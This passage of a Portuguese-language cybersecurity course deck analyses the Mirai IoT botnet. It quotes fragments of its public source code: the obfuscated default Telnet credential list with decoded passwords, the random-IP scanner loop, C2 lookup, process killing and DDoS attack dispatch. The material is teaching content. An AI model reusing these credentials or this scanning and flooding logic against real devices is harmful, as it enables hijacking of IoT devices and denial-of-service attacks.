capturar informações sensíveis como senhas, detalhes de contas
bancárias e mensagens pessoais. Podemos ter tanto como
software quanto como hardware
Bots e Botnets

• Individualmente, os bots podem parecer pequenos programas


automatizados com funções específicas, muitas vezes percebidos
como inofensivos.

• Quando agrupados em larga escala, formando botnets, eles se


tornam forças poderosas. Fonte: AdobeStock
Estudando o Mirai

O Mirai destaca-se como um bom caso didático de botnets, ilustrando


vividamente a capacidade dessas redes em orquestrar ataques
DDoS ao explorar vulnerabilidades em dispositivos IoT.

Algumas razões para estuda-lo:

• Aprendizagem e Aprimoramento em Linguagem C e Go.


Fonte: AdobeStock

• Protocolos de Rede (TCP/IP).

• Compreensão das Vulnerabilidades de IoT.

• Insights sobre Botnets e ataques DDoS.

https://github.com/jgamblin/Mirai-Source-Code
A seguir...

Nesse tópico, exploramos diferentes tipos de malwares e suas


características.

No próximo tópico, desvendaremos o Mirai e investigaremos seu


funcionamento, estratégias e técnicas.
Fonte: ícone de Freepik.com. Acesso em 06 de
dezembro de 2023
Mirai-Infecção e Propagaçao
Identificando dispositivos vulneráveis
scanner.c

void scanner_init(void){
...
// Set up passwords
add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x41\x11\x17\x13\x13", 10);
// root xc3511
add_auth_entry("\x50\x4D\x4D\x56", "\x54\x4B\x58\x5A\x54", 9);
// root vizxv
add_auth_entry("\x50\x4D\x4D\x56", "\x43\x46\x4F\x4B\x4C", 8);
// root admin
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C", 7);
// admin admin Fonte: AdobeStock
add_auth_entry("\x50\x4D\x4D\x56", "\x1A\x1A\x1A\x1A\x1A\x1A", 6);
// root 888888
add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x4F\x4A\x46\x4B\x52\x41", 5);
// root xmhdipc
add_auth_entry("\x50\x4D\x4D\x56", "\x46\x47\x44\x43\x57\x4E\x56", 5);
// root default
add_auth_entry("\x50\x4D\x4D\x56", "\x48\x57\x43\x4C\x56\x47\x41\x4A", 5);
// root juantech
...
}

https://github.com/jgamblin/Mirai-Source-Code
O processo de infecção

• Iniciação do scanner:

• O scanner é inicializado > Prepara o ambiente > Monta pacotes raw


> Envia para IPs aleatórios na porta 23 (Telnet) ou outras portas
comuns.

• Cria combinações de nome de usuário e senha para autenticação. Fonte: AdobeStock

• O scanner envia pacotes SYN para diferentes endereços IP.

• Se pacote SYN-ACK é recebido, dispositivo pronto para Brute Force.

• Tentativas de Brute Force. Máquina de estados controla o processo.

• Se autenticação bem-sucedida, relata a conexão de volta ao controlador.


Estabelecimento da comunicação com o C2

C2

Fonte: AdobeStock
Estabelecimento da comunicação com o C2
main.c
static void resolve_cnc_addr(void)
{
struct resolv_entries *entries;
table_unlock_val(TABLE_CNC_DOMAIN);
entries = resolv_lookup(table_retrieve_val(TABLE_CNC_DOMAIN, NULL));
...

...
printf("[main] Received %d bytes from CNC\n", len);
if (len > 0)
attack_parse(rdbuf, len);
...
Propagação

• Capacidade de buscar novos alvos após infecção inicial.

• Permite captura de dispositivos vulneráveis automaticamente.

• Recebimento de instruções e adaptabilidade através de C2.

• Capacidade de aumentar alcance rapidamente sem intervenção


Fonte: AdobeStock

direta.
Natureza autossustentável
scanner.c
// Loop principal que gera e envia pacotes TCP SYN
while (TRUE)
{
...
for (i = 0; i < SCANNER_RAW_PPS; i++)
{
...
iph->daddr = get_random_ip();
... Fonte: AdobeStock

sendto(rsck, scanner_rawpkt, sizeof (scanner_rawpkt),


MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof (paddr));
}
...
}
Técnica de Brute Force

• Explora segurança frágil e gestão negligente de credenciais.

• Grande quantidade de dispositivos vulneráveis afetados com


esforço mínimo.

• Necessidade de trocar senhas padrão por opções mais seguras.


Fonte: AdobeStock

• Maior educação em segurança cibernética urgente.


A seguir...

Nesse tópico, exploramos o funcionamento técnico:


• Vulnerabilidades em dispositivos.
• Necessidade de aprimorar práticas de segurança na fabricação e
uso

No próximo tópico, abordaremos o detalhamento de como o Mirai realiza


atividades maliciosas. Fonte: ícone de Freepik.com. Acesso em 06 de
dezembro de 2023
Mirai-Estrutura e Comunicação
Arquitetura do código do Mirai

• Arquitetura do código do Mirai


• Dividida em duas partes principais: bots e servidor C&C/C2.

• Gestão Eficiente e Operação Robusta


• Estrutura permite administração eficaz dos bots.
• Operação robusta em diversos ambientes de dispositivos IoT.
Fonte: AdobeStock

• Linguagens de Programação Específicas


• Servidor C&C/C2: Go, plataforma confiável para administração.
• Bots: C, otimizados para dispositivos IoT.

• Benefícios da Divisão
• Facilita a organização e manutenção do código.
• Otimiza a execução do botnet em ambientes variados.

https://github.com/jgamblin/Mirai-Source-Code
Componentes chave do código

C&C/C2:
• main.go – ponto de entrada no binário do servidor.
• admin.go - interface de administração.
• clientList.go - lista de bots alocados para um determinado ataque.
• attack.go - responsável por lidar com a solicitação de ataque iniciada
pelo servidor C&C/C2. Fonte: AdobeStock

Bot:
• main.c – ponto de entrada na execução do bot.
• scanner.c – varredura de endereços IP em busca de outros dispositivos.
• killer.c - mata vários processos em execução no bot.
• attackudp.c – implementa ataques a serem realizados por um bot IoT.
Componentes chave do código
attack.go
var attackInfoLookup map[string]AttackInfo = map[string]AttackInfo {
...
"udp": AttackInfo {
0,
[]uint8 {2, 3, 4, 0, 1, 5, 6, 7, 25},
"UDP flood",
},
...
}
Fonte: AdobeStock
var flagInfoLookup map[string]FlagInfo = map[string]FlagInfo {
...
"len": FlagInfo {
0,
"Size of packet data, default is 512 bytes",
},
...
}

attackInfoLookup e flagInfoLookup definem os ataques disponíveis e as flags que


podem ser usadas para configurá-los. Cada tipo de ataque suporta um conjunto
específico de flags, permitindo personalização detalhada do ataque.
Componentes chave do código
scanner.c
static void setup_connection(struct scanner_connection *conn)
{
...
if (connect(conn->fd, (struct sockaddr *)&addr, sizeof (struct
sockaddr_in)) == -1)
{
// Se a conexão falhar, fecha o socket e tenta novamente mais tarde
close(conn->fd);
...
}
Fonte: AdobeStock
}

static int consume_any_prompt(struct scanner_connection *conn)


{
...
// Verifica por prompts indicando onde inserir credenciais
if (util_memsearch(conn->rdbuf, conn->rdbuf_pos, "assword", 7) != -1)
{
// Se encontrar um prompt de senha, tenta autenticar
...
}
}
Componentes chave do código
killer.c
// Abre /proc/net/tcp para encontrar processos escutando
// na porta especificada
// Se encontrar um processo escutando na porta especificada, tenta matá-lo
BOOL killer_kill_by_port(port_t port)
{
DIR *dir, *fd_dir;
struct dirent *entry, *fd_entry;
...

while (util_fdgets(buffer, 512, fd) != NULL)


Fonte: AdobeStock
{
...
if (util_stristr(exe, util_strlen(exe), inode) != -1)
{
printf("[killer] Found pid %d for port %d\n", util_atoi(pid,
10), ntohs(port));
kill(util_atoi(pid, 10), 9);
ret = 1;
}
}
...
}
Comunicação entre Bots e Servidor C2

• Comunicação no Mirai, entre dispositivos infectados e servidor C&C/C2.

• Processo de registro e comunicação


• Dispositivos recém-infectados registram-se no botnet.
• Estabelecem comunicação com C&C para receber instruções.

• Execução de comandos Fonte: AdobeStock

• Bots executam comandos recebidos do servidor C&C/C2.


• Permite ataques coordenados e propagação do malware.

• Segurança e anonimato
• Comunicação projetada para ser segura e anônima.
• Utiliza técnicas avançadas para evitar detecção.
• Protege contra análise por pesquisadores de segurança e
autoridades.
Registro na Botnet

• Registro inicial
• Primeiro passo após infecção: registro na botnet.
• Comunicação com o servidor C&C/C2 essencial para integração.

• Integração à rede
• Permite que o dispositivo receba comandos do Mirai.
• Participação ativa nas operações e ataques da botnet. Fonte: AdobeStock

• Eficiência do processo
• Processo de registro demonstra a sofisticação da botnet.
• Novos dispositivos rapidamente assimilados.
• Contribui para fortalecer e expandir a rede maliciosa.
Distribuição e Execução de Comandos

• Instruções do Servidor C2

• Dispositivos infectados esperam por ordens após registro.

• Instruções variam de ataques a propagação do malware.

• Variedade de comandos
Fonte: AdobeStock

• Desde lançamento de ataques DDoS a busca por novos


dispositivos para infectar.

• Flexibilidade nas operações do botnet.


Segurança e Anonimato

• Uso de várias técnicas para proteger a rede.

• Emprego de criptografia para segurança das comunicações.

• Técnicas para ocultar a origem dos ataques e a identidade dos


bots.
Fonte: AdobeStock
Orquestração de Ataques DDoS

• Notoriedade por ataques DDoS em grande escala.

• Coordenação meticulosa.

• Seleção e ataques a alvos específicos.

• Utilização eficaz dos dispositivos infectados para lançamento de


Fonte: AdobeStock

ataques.
A seguir...

Nesse tópico, aprofundamos nosso conhecimento na estrutura e


operações do Mirai.

No próximo tópico, abordaremos as Técnicas de Ataque:


Fonte: ícone de Freepik.com. Acesso em 06 de

• Foco nas estratégias de ataque DDoS do Mirai. dezembro de 2023

• Planejamento e execução de ataques, escolha de alvos.


Mirai-Tecnicas de Ataque
Técnicas de Ataque
attack_tcp.c
void attack_tcp_stomp(uint8_t targs_len, struct attack_target *targs, uint8_t
opts_len, struct attack_option *opts)
{
int i, rfd;
...

// Set up receive socket


// Criação de Socket RAW: Esse tipo de socket permite ao usuário manipular os
// pacotes TCP/IP, incluindo cabeçalhos, essencial para criar pacotes maliciosos.
if ((rfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
{ Fonte: AdobeStock
...

attack_udp.c
// Ataque que explora servidores DNS, enviando solicitações com o objetivo de
sobrecarregar o servidor com respostas.

void attack_udp_dns(uint8_t targs_len, struct attack_target *targs, uint8_t opts_len,


struct attack_option *opts)
{
int i, fd;
char **pkts = calloc(targs_len, sizeof (char *));
...
Seleção e alternação entre métodos

A capacidade do Mirai de selecionar e alternar entre diferentes


técnicas de ataque é uma característica chave e versátil.

Algumas funções de ataque nomeadas:

• attack_udp_generic: Ataque UDP genérico.

• attack_udp_vse: Ataque UDP amplificado (VSE).


Fonte: AdobeStock

• attack_udp_dns: Ataque UDP a servidores DNS.

• attack_tcp_syn: Ataque TCP SYN flood.

• attack_tcp_stomp: Ataque TCP STOMP.


Seleção de Alvos

attack.go
Responsável por analisar o comando de ataque e inicializar uma
estrutura Attack com os parâmetros especificados, incluindo os alvos.
func NewAttack(str string, admin int) (*Attack, error) {
...
// Parse targets
if len(args) == 0 {
return nil, errors.New("Must specify prefix/netmask as targets") Fonte: AdobeStock
....
prefix = cidrInfo[0]
if len(cidrInfo) == 2 {
...
netmask = uint8(netmaskTmp)
...

...
// Enfileira o comando de ataque para os bots
clientList.QueueBuf(buf, botCount, "") this.conn.Write([]byte("OK\r\n"))
...
Coordenação do ataque

api.go
Após a autenticação, o comando de ataque (parte do comando
recebido após a chave da API) é processado.
... // Processa o comando de ataque após a autenticação
cmd = passwordSplit[1] ... atk, err := NewAttack(cmd, userInfo.admin)
...

Uma vez que o comando de ataque é validado e processado, o próximo Fonte: AdobeStock

passo é distribuí-lo aos bots apropriados para execução através do método


QueueBuf da clientList.go, que enfileira o comando para ser enviado aos
bots.

...
// Enfileira o comando de ataque para os bots
clientList.QueueBuf(buf, botCount, "") this.conn.Write([]byte("OK\r\n"))
...
Distribuição e sobrecarga

• Dispositivos infectados geram tráfego massivo.

• Cooperação entre bots para sobrecarregar alvos.

• Comando recebido e processado pela API.

• Distribuição para bots conectados.


Fonte: AdobeStock

• Cada bot contribui para o volume total de tráfego.


Impactos

• Sobrecarga de redes e servidores.

• Comprometimento de dispositivos (IoT).

• Interferência em serviços críticos.

• Amplificação dos ataques.


Fonte: AdobeStock

• Custo financeiro para mitigação e recuperação.


Conclusão

Nesse conteúdo, abordamos as Ameaças cibernéticas:


• Tipos de ataques cibernéticos.
• Atores de ameaça.
• Framework MITRE ATT&CK.
• Engenharia Social.
• Malwares, com foco especial no Mirai.
Fonte: ícone de Freepik.com. Acesso em 06 de
dezembro de 2023

• Alguns destaques
• Importância de aprender sobre ameaças como o Mirai.
• Expansão do conhecimento em programação e redes.
• Entendimento aprofundado de tipos de ataques.
• Estratégias de fortalecimento contra ataques.
Recapitulando
Recapitulando

Neste curso, você conheceu os tipos mais comuns de ataques


cibernéticos e quais são os principais atores de ameaças
cibernéticas, suas motivações e alguns estudos de casos
famosos.

Também aprendeu o que é engenharia social, quais as táticas


utilizadas e quais são os tipos de malwares que podem afetar Fonte: Adobe Stock

a vida digital de uma pessoa física ou de uma empresa.


Referências
Referências

CLARKE, R. A.; KNAKE, R. Cyber War. [S. l.]: HarperCollins, 2010.

PROKISCH, C. A. Segurança digital prevenção e resposta a ataques cibernéticos. São Paulo: Editora Senac, 2023.
ZETTER, K. Countdown to Zero Day Stuxnet and the Launch of the World's First Digital Weapon. [S. l.]: Crown, 2014

MITRE ATT&CK. Site. Disponível em<https://attack.mitre.org/> . Acesso em: 18 mar 2024.

GORDOVER, M. Throwback Thursday: Lessons Learned from the 2008 Heartland Data Breach in PROOFPOINT. 19 mar
2015. Disponível em: <https://www.proofpoint.com/us/blog/insider-threat-management/throwback-thursday-lessons-
learned-2008-heartland-breach>. Acesso em: 18 mar 2024.

VIJAYAN, J. Sony Pictures falls victim to major data breach in Computerworld. Disponível em: <
https://www.computerworld.com/article/2508871/sony-pictures-falls-victim-to-major-data-breach.html>. Acesso em:
18 mar 2024.
Referências

RAHMAN, M. H.; CASSANDRO, R.; WUEST, T.; SHAFAE, M. Taxonomy for Cybersecurity Threat Attributes and
Countermeasures in Smart Manufacturing Systems. Disponível em:
<https://arxiv.org/ftp/arxiv/papers/2401/2401.01374.pdf>. Acesso em: 18 mar 2024.

VENTURA, F. O maior ataque DDoS já registrado teve como alvo o GitHub in Tecnoblog. Disponível em:
<https://tecnoblog.net/noticias/maior-ataque-ddos-github/>. Acesso em: 18 mar 2024.

GAMBLIN, J. Mirai Source Code. Disponível em: <https://github.com/jgamblin/Mirai-Source-Code> . Acesso em: 18 mar
2024.

Você também pode gostar